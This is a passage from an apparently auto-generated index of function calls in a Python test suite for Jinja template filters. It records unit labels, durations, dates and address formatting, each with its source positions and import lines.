68), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(498, 49, 498, 67): '"""volume-megaliter"""'}, {}), "('volume-megaliter')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((499, 25, 499, 65), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(499, 49, 499, 64): '"""duration-hour"""'}, {}), "('duration-hour')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((500, 25, 500, 73), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(500, 49, 500, 64): '"""duration-hour"""', (500, 66, 500, 72): '"""long"""'}, {}), "('duration-hour', 'long')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((501, 25, 501, 65), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(501, 49, 501, 64): '"""duration-year"""'}, {}), "('duration-year')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((502, 25, 502, 73), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(502, 49, 502, 64): '"""duration-year"""', (502, 66, 502, 72): '"""long"""'}, {}), "('duration-year', 'long')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((506, 25, 506, 65), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(506, 49, 506, 64): '"""duration-hour"""'}, {}), "('duration-hour')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((507, 25, 507, 73), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(507, 49, 507, 64): '"""duration-hour"""', (507, 66, 507, 72): '"""long"""'}, {}), "('duration-hour', 'long')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((508, 25, 508, 65), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(508, 49, 508, 64): '"""duration-year"""'}, {}), "('duration-year')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((509, 25, 509, 73), 'app.jinja_filters.format_unit_input_label', 'format_unit_input_label', ({(509, 49, 509, 64): '"""duration-year"""', (509, 66, 509, 72): '"""long"""'}, {}), "('duration-year', 'long')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((577, 23, 577, 34), 'jinja2.Undefined', 'Undefined', ({}, {}), '()', False, 'from jinja2 import Undefined, Markup\n'), ((581, 12, 581, 28), 'app.jinja_filters.max_value', 'max_value', ({(581, 22, 581, 27): '*args'}, {}), '(*args)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((594, 12, 594, 28), 'app.jinja_filters.max_value', 'max_value', ({(594, 22, 594, 27): '*args'}, {}), '(*args)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((624, 21, 624, 42), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, timedelta\n'), ((655, 23, 655, 34), 'jinja2.Undefined', 'Undefined', ({}, {}), '()', False, 'from jinja2 import Undefined, Markup\n'), ((659, 12, 659, 28), 'app.jinja_filters.min_value', 'min_value', ({(659, 22, 659, 27): '*args'}, {}), '(*args)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((672, 12, 672, 28), 'app.jinja_filters.min_value', 'min_value', ({(672, 22, 672, 27): '*args'}, {}), '(*args)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((702, 21, 702, 42), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, timedelta\n'), ((841, 12, 841, 84), 'app.jinja_filters.calculate_offset_from_weekday_in_last_whole_week', 'calculate_offset_from_weekday_in_last_whole_week', ({(841, 61, 841, 73): '"""2018-08-10"""', (841, 75, 841, 77): '{}', (841, 79, 841, 83): '"""BA"""'}, {}), "('2018-08-10', {}, 'BA')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((844, 13, 844, 48), 'unittest.mock.patch', 'patch', ({(844, 19, 844, 47): '"""app.jinja_filters.datetime"""'}, {}), "('app.jinja_filters.datetime')", False, 'from unittest.mock import patch\n'), ((846, 48, 846, 69), 'datetime.datetime', 'datetime', ({(846, 57, 846, 61): '2018', (846, 63, 846, 64): '8', (846, 66, 846, 68): '10'}, {}), '(2018, 8, 10)', False, 'from datetime import datetime, timedelta\n'), ((849, 21, 849, 85), 'app.jinja_filters.calculate_offset_from_weekday_in_last_whole_week', 'calculate_offset_from_weekday_in_last_whole_week', ({(849, 70, 849, 74): 'None', (849, 76, 849, 78): '{}', (849, 80, 849, 84): '"""SU"""'}, {}), "(None, {}, 'SU')", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((903, 12, 903, 51), 'app.jinja_filters.format_repeating_summary', 'format_repeating_summary', ({(903, 37, 903, 41): 'None', (903, 43, 903, 50): 'case[0]'}, {}), '(None, case[0])', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((909, 29, 909, 63), 'app.jinja_filters.format_repeating_summary', 'format_repeating_summary', ({(909, 54, 909, 58): 'None', (909, 60, 909, 62): '[]'}, {}), '(None, [])', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((917, 32, 917, 43), 'jinja2.Undefined', 'Undefined', ({}, {}), '()', False, 'from jinja2 import Undefined, Markup\n'), ((917, 45, 917, 56), 'jinja2.Undefined', 'Undefined', ({}, {}), '()', False, 'from jinja2 import Undefined, Markup\n'), ((917, 58, 917, 69), 'jinja2.Undefined', 'Undefined', ({}, {}), '()', False, 'from jinja2 import Undefined, Markup\n'), ((917, 71, 917, 82), 'jinja2.Undefined', 'Undefined', ({}, {}), '()', False, 'from jinja2 import Undefined, Markup\n'), ((917, 84, 917, 95), 'jinja2.Undefined', 'Undefined', ({}, {}), '()', False, 'from jinja2 import Undefined, Markup\n'), ((920, 25, 920, 84), 'app.jinja_filters.format_address_list', 'format_address_list', ({(920, 45, 920, 65): 'user_entered_address', (920, 67, 920, 83): 'metadata_address'}, {}), '(user_entered_address, metadata_address)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((926, 25, 926, 84), 'app.jinja_filters.format_address_list', 'format_address_list', ({(926, 45, 926, 65): 'user_entered_address', (926, 67, 926, 83): 'metadata_address'}, {}), '(user_entered_address, metadata_address)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((932, 12, 932, 71), 'app.jinja_filters.format_address_list', 'format_address_list', ({(932, 32, 932, 52): 'user_entered_address', (932, 54, 932, 70): 'metadata_address'}, {}), '(user_entered_address, metadata_address)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((938, 25, 938, 84), 'app.jinja_filters.format_address_list', 'format_address_list', ({(938, 45, 938, 65): 'user_entered_address', (938, 67, 938, 83): 'metadata_address'}, {}), '(user_entered_address, metadata_address)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((944, 25, 944, 84), 'app.jinja_filters.format_address_list', 'format_address_list', ({(944, 45, 944, 65): 'user_entered_address', (944, 67, 944, 83): 'metadata_address'}, {}), '(user_entered_address, metadata_address)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((950, 25, 950, 84), 'app.jinja_filters.format_address_list', 'format_address_list', ({(950, 45, 950, 65): 'user_entered_address', (950, 67, 950, 83): 'metadata_address'}, {}), '(user_entered_address, metadata_address)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((957, 12, 957, 65), 'app.jinja_filters.format_address_list', 'format_address_list', ({(957, 32, 957, 46): 'answer_address', (957, 48, 957, 64): 'metadata_address'}, {}), '(answer_address, metadata_address)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((43, 51, 43, 62), 'jinja2.Undefined', 'Undefined', ({}, {}), '()', False, 'from jinja2 import Undefined, Markup\n'), ((62, 66, 62, 77), 'jinja2.Undefined', 'Undefined', ({}, {}), '()', False, 'from jinja2 import Undefined, Markup\n'), ((76, 39, 76, 50), 'jinja2.Undefined', 'Undefined', ({}, {}), '()', False, 'from jinja2 import Undefined, Markup\n'), ((222, 16, 222, 78), 'app.jinja_filters.format_conditional_date', 'format_conditional_date', ({(222, 40, 222, 63): 'self.autoescape_context', (222, 65, 222, 70): 'date1', (222, 72, 222, 77): 'date2'}, {}), '(self.autoescape_context, date1, date2)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((249, 31, 249, 93), 'app.jinja_filters.format_conditional_date', 'format_conditional_date', ({(249, 55, 249, 78): 'self.autoescape_context', (249, 80, 249, 85): 'date1', (249, 87, 249, 92): 'date2'}, {}), '(self.autoescape_context, date1, date2)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((270, 35, 270, 83), 'app.jinja_filters.calculate_years_difference', 'calculate_years_difference', ({(270, 62, 270, 72): 'start_date', (270, 74, 270, 82): 'end_date'}, {}), '(start_date, end_date)', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((514, 29, 514, 71), 'app.jinja_filters.format_duration', 'format_duration', ({(514, 45, 514, 70): "{'years': 5, 'months': 4}"}, {}), "({'years': 5, 'months': 4})", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((515, 29, 515, 71), 'app.jinja_filters.format_duration', 'format_duration', ({(515, 45, 515, 70): "{'years': 5, 'months': 0}"}, {}), "({'years': 5, 'months': 0})", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((516, 29, 516, 71), 'app.jinja_filters.format_duration', 'format_duration', ({(516, 45, 516, 70): "{'years': 0, 'months': 4}"}, {}), "({'years': 0, 'months': 4})", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((517, 29, 517, 71), 'app.jinja_filters.format_duration', 'format_duration', ({(517, 45, 517, 70): "{'years': 1, 'months': 1}"}, {}), "({'years': 1, 'months': 1})", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((518, 29, 518, 71), 'app.jinja_filters.format_duration', 'format_duration', ({(518, 45, 518, 70): "{'years': 0, 'months': 0}"}, {}), "({'years': 0, 'months': 0})", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((522, 29, 522, 58), 'app.jinja_filters.format_duration', 'format_duration', ({(522, 45, 522, 57): "{'years': 5}"}, {}), "({'years': 5})", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((523, 29, 523, 58), 'app.jinja_filters.format_duration', 'format_duration', ({(523, 45, 523, 57): "{'years': 1}"}, {}), "({'years': 1})", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((524, 29, 524, 58), 'app.jinja_filters.format_duration', 'format_duration', ({(524, 45, 524, 57): "{'years': 0}"}, {}), "({'years': 0})", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((528, 29, 528, 59), 'app.jinja_filters.format_duration', 'format_duration', ({(528, 45, 528, 58): "{'months': 5}"}, {}), "({'months': 5})", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((529, 29, 529, 59), 'app.jinja_filters.format_duration', 'format_duration', ({(529, 45, 529, 58): "{'months': 1}"}, {}), "({'months': 1})", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((530, 29, 530, 59), 'app.jinja_filters.format_duration', 'format_duration', ({(530, 45, 530, 58): "{'months': 0}"}, {}), "({'months': 0})", False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((837, 29, 837, 89), 'app.jinja_filters.calculate_offset_from_weekday_in_last_whole_week', 'calculate_offset_from_weekday_in_last_whole_week', ({(837, 78, 837, 88): '*case[0:3]'}, {}), '(*case[0:3])', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list\n'), ((847, 69, 847, 99), 'datetime.datetime.strftime', 'datetime.strftime', ({(847, 87, 847, 92): '*args'}, {}), '(*args, **kw)', False, 'from datetime import datetime, timedelta\n'), ((131, 36, 131, 53), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((864, 20, 864, 75), 'app.jinja_filters.format_date_custom', 'format_date_custom', ({(864, 39, 864, 62): 'self.autoescape_context', (864, 64, 864, 74): '*case[0:2]'}, {}), '(self.autoescape_context, *case[0:2])', False, 'from app.jinja_filters import format_date, format_conditional_date, format_currency, get_currency_symbol, format_multilined_string, format_percentage, format_date_range, format_household_member_name, format_datetime, format_number_to_alphabetic_letter, format_unit, format_currency_for_input, format_number, format_unordered_list, format_unit_input_label, format_household_member_name_possessive, concatenated_list, calculate_years_difference, get_current_date, as_london_tz, max_value, min_value, get_question_title, get_answer_label, format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom, format_date_range_no_repeated_month_year, format_repeating_summary, 